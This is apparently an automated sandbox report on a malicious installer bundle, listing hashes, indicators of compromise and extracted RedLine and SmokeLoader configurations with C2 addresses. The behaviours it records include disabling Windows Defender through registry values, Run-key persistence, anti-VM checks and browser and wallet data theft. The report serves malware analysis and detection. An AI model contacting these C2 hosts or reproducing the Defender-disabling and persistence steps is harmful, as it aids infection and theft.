Resubmissions
05-10-2021 16:27
211005-tx24csaah9 1004-10-2021 16:37
211004-t43cpsgfe7 1004-10-2021 07:39
211004-jhgtrsfhf8 1003-10-2021 18:09
211003-wryvvsffgk 1002-10-2021 23:31
211002-3hwsgaehhl 1002-10-2021 06:10
211002-gxfh5sdgg7 1001-10-2021 13:44
211001-q16deabhek 10Analysis
-
max time kernel
1800s -
max time network
1804s -
platform
windows11_x64 -
resource
win11 -
submitted
05-10-2021 16:27
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
General
-
Target
setup_x86_x64_install.exe
-
Size
6.4MB
-
MD5
c6e46aa3d6424b03e0a4ccb193d3eade
-
SHA1
c8b49055743fa7b4d6a982aea26efb627bb1f2e1
-
SHA256
5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
-
SHA512
06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Extracted
smokeloader
2020
http://fiskahlilian16.top/
http://paishancho17.top/
http://ydiannetter18.top/
http://azarehanelle19.top/
http://quericeriant20.top/
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5844 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6312 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1204 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7116 4884 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/5696-280-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/5696-284-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 45 IoCs
Processes:
WerFault.exeWerFault.exemsedge.exeWMIC.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepz1w402Pzju6IfXoNbdcpz6B.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4528 created 4540 4528 WerFault.exe ShadowVPNInstaller_t3.exe PID 5504 created 5232 5504 WerFault.exe rundll32.exe PID 6820 created 4540 6820 msedge.exe ShadowVPNInstaller_t3.exe PID 7084 created 3864 7084 WMIC.exe Fri105268dda3.exe PID 5768 created 4588 5768 WerFault.exe Fri1015b9a4e0b.exe PID 5756 created 5304 5756 WerFault.exe mshta.exe PID 7144 created 4992 7144 WerFault.exe Fri10720d229511df563.exe PID 1808 created 6176 1808 WerFault.exe U4uZdyxAijsXh5zAJKtumxYy.exe PID 6284 created 4540 6284 WerFault.exe ShadowVPNInstaller_t3.exe PID 6748 created 5236 6748 WerFault.exe FvZoTSTSOGQSyVChh8_aLSmB.exe PID 2488 created 5512 2488 cmd.exe 7494909.scr PID 3948 created 5284 3948 WerFault.exe nwXhT4mxvbU7CM6XMjEXIBmy.exe PID 6056 created 4540 6056 WerFault.exe ShadowVPNInstaller_t3.exe PID 5328 created 3544 5328 WerFault.exe rundll32.exe PID 7540 created 4540 7540 WerFault.exe ShadowVPNInstaller_t3.exe PID 7576 created 5024 7576 WerFault.exe cmd.exe PID 8136 created 4672 8136 WerFault.exe setup.exe PID 7200 created 5396 7200 pz1w402Pzju6IfXoNbdcpz6B.exe kC0fqcBmzMdbc8QWWAtGpoTa.exe PID 4936 created 4540 4936 WerFault.exe ShadowVPNInstaller_t3.exe PID 7544 created 5140 7544 WerFault.exe cVMGrdBG7bRqTx2km4LCCZhc.exe PID 7932 created 7200 7932 WerFault.exe pz1w402Pzju6IfXoNbdcpz6B.exe PID 4600 created 4660 4600 WerFault.exe WMIC.exe PID 8356 created 6808 8356 WerFault.exe _qv5j3tyMd2tOxtT6_2zON_w.exe PID 7436 created 3104 7436 cmd.exe C193.exe PID 7244 created 2552 7244 WerFault.exe 2D3F.exe PID 2904 created 7096 2904 WerFault.exe DAD8.exe PID 6968 created 8008 6968 WerFault.exe 7229.exe PID 5540 created 4540 5540 WerFault.exe ShadowVPNInstaller_t3.exe PID 4972 created 5884 4972 WerFault.exe vc.exe PID 7464 created 7048 7464 WerFault.exe GcleanerEU.exe PID 6996 created 4540 6996 WerFault.exe ShadowVPNInstaller_t3.exe PID 6528 created 4540 6528 WerFault.exe ShadowVPNInstaller_t3.exe PID 6604 created 6172 6604 WerFault.exe gcleaner.exe PID 9040 created 7732 9040 WerFault.exe rundll32.exe PID 5516 created 4540 5516 WerFault.exe ShadowVPNInstaller_t3.exe PID 3908 created 4540 3908 WerFault.exe ShadowVPNInstaller_t3.exe PID 5820 created 4540 5820 WerFault.exe ShadowVPNInstaller_t3.exe PID 1328 created 4540 1328 WerFault.exe ShadowVPNInstaller_t3.exe PID 5664 created 4540 5664 WerFault.exe ShadowVPNInstaller_t3.exe PID 3856 created 4540 3856 WerFault.exe ShadowVPNInstaller_t3.exe PID 7060 created 1636 7060 WerFault.exe powershell.exe PID 7584 created 3112 7584 msedge.exe rundll32.exe PID 7588 created 5036 7588 WerFault.exe gcleaner.exe PID 6212 created 4540 6212 WerFault.exe ShadowVPNInstaller_t3.exe PID 9084 created 4540 9084 WerFault.exe ShadowVPNInstaller_t3.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 3628 created 8096 3628 svchost.exe AdvancedRun.exe PID 3628 created 8096 3628 svchost.exe AdvancedRun.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Arkei Stealer Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5728-595-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5236-560-0x0000000000EC0000-0x0000000000F96000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 41 IoCs
Processes:
RunDll32.exeMsiExec.exeflow pid process 125 6256 RunDll32.exe 551 428 MsiExec.exe 555 428 MsiExec.exe 559 428 MsiExec.exe 560 428 MsiExec.exe 562 428 MsiExec.exe 565 428 MsiExec.exe 569 428 MsiExec.exe 571 428 MsiExec.exe 574 428 MsiExec.exe 575 428 MsiExec.exe 576 428 MsiExec.exe 580 428 MsiExec.exe 582 428 MsiExec.exe 585 428 MsiExec.exe 586 428 MsiExec.exe 588 428 MsiExec.exe 589 428 MsiExec.exe 592 428 MsiExec.exe 594 428 MsiExec.exe 596 428 MsiExec.exe 597 428 MsiExec.exe 599 428 MsiExec.exe 601 428 MsiExec.exe 603 428 MsiExec.exe 606 428 MsiExec.exe 607 428 MsiExec.exe 610 428 MsiExec.exe 612 428 MsiExec.exe 615 428 MsiExec.exe 617 428 MsiExec.exe 619 428 MsiExec.exe 621 428 MsiExec.exe 622 428 MsiExec.exe 625 428 MsiExec.exe 628 428 MsiExec.exe 632 428 MsiExec.exe 634 428 MsiExec.exe 635 428 MsiExec.exe 636 428 MsiExec.exe 638 428 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
vc.exeAdam.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts vc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Adam.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri10584c049c7f.exeFri1034cd265b5e0adcd.exeFri10b0a06a73706.exeFri1015b9a4e0b.exeFri1008c7d6874.exeFri10720d229511df563.exeFri1018ef4aa251c026c.exeFri103a7805577.exeFri106e757f6d75.exeFri10d184202996a0d7f.exeFri105268dda3.exeFri10fcc13ae0125c8.exeFri10acd1e0a9e6.exeFri10fcc13ae0125c8.tmpSkVPVS3t6Y8W.EXevc.exereg.exeLzmwAqmV.exeFri106e757f6d75.exe8350716.scrw2uxcc4cMRtRDh1lxPYaRWBr.exeChrome 5.exe3012335.scrDownFlSetup110.exeinst001.execmd.exe1957141.scrShadowVPNInstaller_t3.exe5918144.scrmIlYO2PyRnBpdQPMVtWd6Z5a.exeCTtuY9hwW3FMqWux3oZa60MB.exeBqM9xg9qbPitNmvDRi7VB_Mv.exekC0fqcBmzMdbc8QWWAtGpoTa.exenwXhT4mxvbU7CM6XMjEXIBmy.exeConhost.exell7hAlWZUM8aVRdhySt_kLQl.execVMGrdBG7bRqTx2km4LCCZhc.exeFvZoTSTSOGQSyVChh8_aLSmB.exe7494909.scrcmd.exesetup.exe6vGqPAu8qfeRGLQgsAgR62zN.exeomEx3DWuyvkBKV7FT0AQ3ScE.execVMGrdBG7bRqTx2km4LCCZhc.exeU4uZdyxAijsXh5zAJKtumxYy.exezcTMrSsC4g_EqadNJiqR1MnZ.exexYJIic1KM0Xbco03L0Ro5fdE.exeD88ljDFq9UNOTj9KFLyY3k9N.exeJ492h11PeW4FIMg2ZMZJh672.exeNxIkUSKf9VBiWWvuufV4fDQe.exelQsTdAlkjYNFfnwvOn0eBKaz.exeluvO_4is6mQFfHuxYrzdcbZB.exeBVEDf_soBBvQiBPdzpwHsDT7.exeYsrDtrUWJpAIJknuajZA_Tgl.exe6.exeWinHoster.execm3.execmd.exe1208989.scrpowershell.exeinst002.exeDownFlSetup999.exepid process 3540 setup_installer.exe 2756 setup_install.exe 784 Fri10584c049c7f.exe 2220 Fri1034cd265b5e0adcd.exe 3736 Fri10b0a06a73706.exe 4588 Fri1015b9a4e0b.exe 4608 Fri1008c7d6874.exe 4992 Fri10720d229511df563.exe 4376 Fri1018ef4aa251c026c.exe 1112 Fri103a7805577.exe 1116 Fri106e757f6d75.exe 1120 Fri10d184202996a0d7f.exe 3864 Fri105268dda3.exe 3588 Fri10fcc13ae0125c8.exe 5304 Fri10acd1e0a9e6.exe 5372 Fri10fcc13ae0125c8.tmp 5848 SkVPVS3t6Y8W.EXe 5884 vc.exe 5928 reg.exe 6000 LzmwAqmV.exe 5696 Fri106e757f6d75.exe 6040 8350716.scr 5260 w2uxcc4cMRtRDh1lxPYaRWBr.exe 5648 Chrome 5.exe 5840 3012335.scr 3976 DownFlSetup110.exe 5960 inst001.exe 5024 cmd.exe 668 1957141.scr 4540 ShadowVPNInstaller_t3.exe 4132 5918144.scr 4872 mIlYO2PyRnBpdQPMVtWd6Z5a.exe 5608 CTtuY9hwW3FMqWux3oZa60MB.exe 4120 BqM9xg9qbPitNmvDRi7VB_Mv.exe 5396 kC0fqcBmzMdbc8QWWAtGpoTa.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5676 Conhost.exe 5728 ll7hAlWZUM8aVRdhySt_kLQl.exe 5140 cVMGrdBG7bRqTx2km4LCCZhc.exe 5236 FvZoTSTSOGQSyVChh8_aLSmB.exe 5512 7494909.scr 5432 cmd.exe 4672 setup.exe 5680 6vGqPAu8qfeRGLQgsAgR62zN.exe 6160 omEx3DWuyvkBKV7FT0AQ3ScE.exe 6168 cVMGrdBG7bRqTx2km4LCCZhc.exe 6176 U4uZdyxAijsXh5zAJKtumxYy.exe 6184 zcTMrSsC4g_EqadNJiqR1MnZ.exe 6204 xYJIic1KM0Xbco03L0Ro5fdE.exe 6220 D88ljDFq9UNOTj9KFLyY3k9N.exe 6380 J492h11PeW4FIMg2ZMZJh672.exe 6416 NxIkUSKf9VBiWWvuufV4fDQe.exe 6676 lQsTdAlkjYNFfnwvOn0eBKaz.exe 6716 luvO_4is6mQFfHuxYrzdcbZB.exe 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe 6920 YsrDtrUWJpAIJknuajZA_Tgl.exe 6908 6.exe 7064 WinHoster.exe 4372 cm3.exe 1220 cmd.exe 1680 1208989.scr 2076 powershell.exe 1484 inst002.exe 6300 DownFlSetup999.exe -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
3768036.scr5372622.scrInstall.exe8325071.scr1264582.scr7494909.scrInstall.exeFri10d184202996a0d7f.exe3012335.scr6vGqPAu8qfeRGLQgsAgR62zN.exeomEx3DWuyvkBKV7FT0AQ3ScE.exe7842883.scr5968173.scr1957141.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3768036.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5372622.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8325071.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3768036.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1264582.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7494909.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3012335.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6vGqPAu8qfeRGLQgsAgR62zN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion omEx3DWuyvkBKV7FT0AQ3ScE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7842883.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3012335.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion omEx3DWuyvkBKV7FT0AQ3ScE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7842883.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1264582.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7494909.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8325071.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5968173.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1957141.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1957141.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6vGqPAu8qfeRGLQgsAgR62zN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5372622.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5968173.scr -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeFri10fcc13ae0125c8.tmprundll32.exesetup_2.tmpsvchost.exerundll32.exell7hAlWZUM8aVRdhySt_kLQl.exeLzmwAqmV.exerundll32.exeinstaller.tmpWMIC.exevc.exeE7_q5xma2JVRvdCbEcfyiaua.tmprundll32.exerundll32.exemsedge.exerundll32.exerundll32.exerundll32.exeinstaller.exeMsiExec.exerundll32.exeShadowVPNInstaller_t3.exeautosubplayer.exeMsiExec.exepid process 2756 setup_install.exe 2756 setup_install.exe 2756 setup_install.exe 2756 setup_install.exe 2756 setup_install.exe 5372 Fri10fcc13ae0125c8.tmp 5232 rundll32.exe 6984 setup_2.tmp 3628 svchost.exe 2512 rundll32.exe 2512 rundll32.exe 5728 ll7hAlWZUM8aVRdhySt_kLQl.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 4524 LzmwAqmV.exe 3544 rundll32.exe 3408 installer.tmp 5496 WMIC.exe 5884 vc.exe 6760 E7_q5xma2JVRvdCbEcfyiaua.tmp 8276 rundll32.exe 1528 rundll32.exe 7584 msedge.exe 6728 rundll32.exe 6728 rundll32.exe 6152 rundll32.exe 6152 rundll32.exe 7672 rundll32.exe 7672 rundll32.exe 7792 installer.exe 7792 installer.exe 7792 installer.exe 8652 MsiExec.exe 7732 rundll32.exe 8652 MsiExec.exe 4540 ShadowVPNInstaller_t3.exe 4540 ShadowVPNInstaller_t3.exe 4540 ShadowVPNInstaller_t3.exe 9112 autosubplayer.exe 428 MsiExec.exe 428 MsiExec.exe 428 MsiExec.exe 428 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exe themida C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exe themida behavioral1/memory/1120-251-0x0000000000FB0000-0x0000000000FB1000-memory.dmp themida C:\Users\Admin\AppData\Roaming\3012335.scr themida -
Processes:
DAD8.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" DAD8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths DAD8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DAD8.exe = "0" DAD8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" DAD8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet DAD8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" DAD8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features DAD8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions DAD8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection DAD8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" DAD8.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
8350716.scrvc.exeAdam.exeVC_redist.x86.exemsedge.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8350716.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Rolanetudo.exe\"" vc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xilufizhate.exe\"" Adam.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{a8968509-65be-4c09-a460-fd1584b1cdbf} = "\"C:\\ProgramData\\Package Cache\\{a8968509-65be-4c09-a460-fd1584b1cdbf}\\VC_redist.x86.exe\" /burn.runonce" VC_redist.x86.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
8325071.scr3768036.scr5968173.scr1957141.scr7842883.scr7494909.scromEx3DWuyvkBKV7FT0AQ3ScE.exe5372622.scr1264582.scrOQ9NtuO6JHQnY9SFDYgUVVIz.exeFri10d184202996a0d7f.exe3012335.scr6vGqPAu8qfeRGLQgsAgR62zN.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8325071.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3768036.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5968173.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1957141.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7842883.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7494909.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA omEx3DWuyvkBKV7FT0AQ3ScE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5372622.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1264582.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OQ9NtuO6JHQnY9SFDYgUVVIz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3012335.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6vGqPAu8qfeRGLQgsAgR62zN.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\P: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 110 ipinfo.io 163 ipinfo.io 1 ip-api.com 5 ip-api.com 5 ipinfo.io 21 ipinfo.io -
Drops file in System32 directory 10 IoCs
Processes:
rundll32.exerundll32.exeInstall.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 43 IoCs
Processes:
